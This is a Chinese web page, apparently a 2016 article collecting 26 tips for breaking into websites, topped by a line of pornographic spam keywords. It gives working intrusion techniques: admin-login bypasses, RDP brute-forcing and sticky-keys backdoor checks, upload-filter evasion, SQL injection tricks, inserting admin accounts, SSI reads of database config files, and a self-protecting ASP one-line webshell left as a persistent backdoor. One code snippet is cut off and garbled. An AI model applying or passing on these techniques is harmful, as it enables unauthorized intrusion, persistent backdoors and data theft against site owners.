欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

網(wǎng)站個人滲透技巧收集與總結(jié)

  發(fā)布時間:2016-08-24 18:27:32   作者:佚名   我要評論
這篇文章主要介紹了網(wǎng)站個人滲透技巧收集與總結(jié) ,大家也要注意一下不要犯下面的錯誤,需要的朋友可以參考下

1.利用網(wǎng)站過濾不嚴直接繞過后臺驗證,在網(wǎng)站后面加上 admin/session.asp 或 admin/left.asp

2.有的網(wǎng)站進后臺會出現(xiàn)一個腳本提示框,輸入:administrator 即可突破!admin代表以管理員身份進入的意思。

3.有的網(wǎng)站開了3389,入侵之前先去連接3389,嘗試弱口令或是爆破,再者就是按5次shift鍵,看看有沒前人裝過后門,然后再社工密碼。

4.有時候進后臺會彈出提示框“請登陸”,把地址抄寫出來(復(fù)制不了),然后放在網(wǎng)頁源代碼分析器里,選擇瀏覽器-攔截跳轉(zhuǎn)勾選–查看即可進入后臺!

5.突破防盜鏈訪問webshell,代碼:


復(fù)制代碼
代碼如下:

javascript:document.write("<a )
 

回車后點擊GO即可進入webshell

6.突破一流信息監(jiān)控攔截系統(tǒng)訪問,當小馬可以訪問,上傳大馬卻不行的時候,可以先用大馬跟一張圖片合并,在上傳合并后的圖片,接著數(shù)據(jù)庫備份后訪問即可!

7.在拿編輯器的shell時,有時增加了asp|asa|cer|php|aspx等擴展名上傳時都被過濾了,其實只要增加aaspsp 上傳asp就會突破了。

8.有時啊D猜出表段了,但是猜不到字段的時候,可以到后臺查看源文件,搜索ID或type,一般都能找到,再到啊D里添加字段進行猜解內(nèi)容即可突破。

9.社工后臺密碼可以用這個技巧,假如網(wǎng)站域名是:exehack.Net 管理員名稱為admin,可以試試密碼“exehack”和“exehack.net”來登陸。

10.手工注入時如果網(wǎng)站過濾了 and 1=1   and 1=2 ,可以用xor 1=1   xor 1=2 進行判斷。

11.本地構(gòu)造上傳一句話木馬,如果提示“請先選擇你要上傳的文件![ 重新上傳 ]” ,說明文件太小了,用記事本打開再復(fù)制多幾句話從而擴大文件大小,再上傳即可。

12.用啊d跑表,跑字段名name和pass出不來,顯示長度超過50什么的,猜解不出的情況下,這時放在穿山甲去跑一般都能跑出來!

13.猜管理員后臺小技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 會現(xiàn)出菜單導(dǎo)航,然后迅雷下載全部鏈接。

14.知道表名,字段,使用SQL語句在ACCESS數(shù)據(jù)庫中加個用戶名及密碼語句:

Insert into admin(user,pwd) values('test','test')

15.當獲得管理員密碼,卻拿不到管理員的帳號時,到前臺隨便打開一個新聞,找找諸如“提交者”“發(fā)布者”之類的字眼,一般“提交者”就是管理員的帳號了。

16.爆破ASP+IIS架設(shè)的網(wǎng)站web絕對路徑,假設(shè)網(wǎng)站主頁為:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。

17.源碼的利用,很多網(wǎng)站用的都是網(wǎng)上下載的源碼,有的站長很懶,什么也不改,然后就上傳開通網(wǎng)站了,我們可以去下載一套,里面有很多默認的信息值得利用。

18.把以下代碼上傳到webshell里,后綴是asp,就算別人發(fā)現(xiàn)了也刪除不了,算是超級防刪的一句話木馬了,可以很安全的留個后門,菜刀連接密碼:x

<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>

19.當破解出帳號密碼卻找不到后臺的時候,可以嘗試鏈接ftp,假如域名是:www.baidu.com “ 得到的密碼為“bishi”,我們就可以試下用“xxxx”“xxxx.cn”www.xxxx.cn作為FTP 用戶名,用“bishi”:作為FTP密碼來進行登陸,成功的幾率可以很大的哦!ftp的默認端口:21  默認帳號密碼:test

20.有的后臺不顯示驗證碼,難道就沒法登錄了么? 其實把一段代碼導(dǎo)入注冊表里就可以突破這個困境了,把下面的代碼保存為Code.reg,雙擊導(dǎo)入就可以了!


復(fù)制代碼
代碼如下:

REGEDIT4</p> <p>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

21.當網(wǎng)站不允許上傳 asp、asa、php等文件時,我們可以上傳一個stm文件,代碼為:


復(fù)制代碼
代碼如下:

“<!--#include file=”conn.asp”-->”

(想查看什么文件就寫什么文件名,這里我假設(shè)想查看“conn.asp”),
然后直接打開這個stm文件的地址,再查看源代碼,“conn.asp”這個文件的代碼就一覽無遺了!

22.當網(wǎng)站不允許上傳ASP,CGI,CER,CDX,HTR等類型的文件時,嘗試上傳一個shtm文件,內(nèi)容為:


復(fù)制代碼
代碼如下:

<!--#includ file="conn.asp"-->

  

如果上傳成功,那太好了,訪問地址就可以瀏覽conn.asp里的內(nèi)容了,這樣一來,數(shù)據(jù)庫路徑也就到手啦!

23.手工檢測注入點彈出“你的操作已被記錄!”之類的信息,訪問這個文件:sqlin.asp,如果存在,在注入點后面植入一句話木馬:
‘excute(request(“TNT”))

接著用一句話木馬客戶端連接:http://www.xxx.com/sqlin.asp,上傳木馬即可拿下shell,因為很多防注入程序都是用”sqlin.asp“這個文件名來做非法記錄的數(shù)據(jù)庫。

24.旁注的話,肯定是挑支持aspx的站點來日了,問題是怎樣判斷呢?方法很簡單,在在網(wǎng)站后面加上xxx.aspx,如果返回“/”應(yīng)用程序中的服務(wù)器錯誤,無法找到該資源,404畫面就說明支持aspx木馬。

25.網(wǎng)站后面加test.php 可以查看版本

26.禁忌這兩個網(wǎng)站后臺文件 admin_index.asp  manage_login.asp

相關(guān)文章

最新評論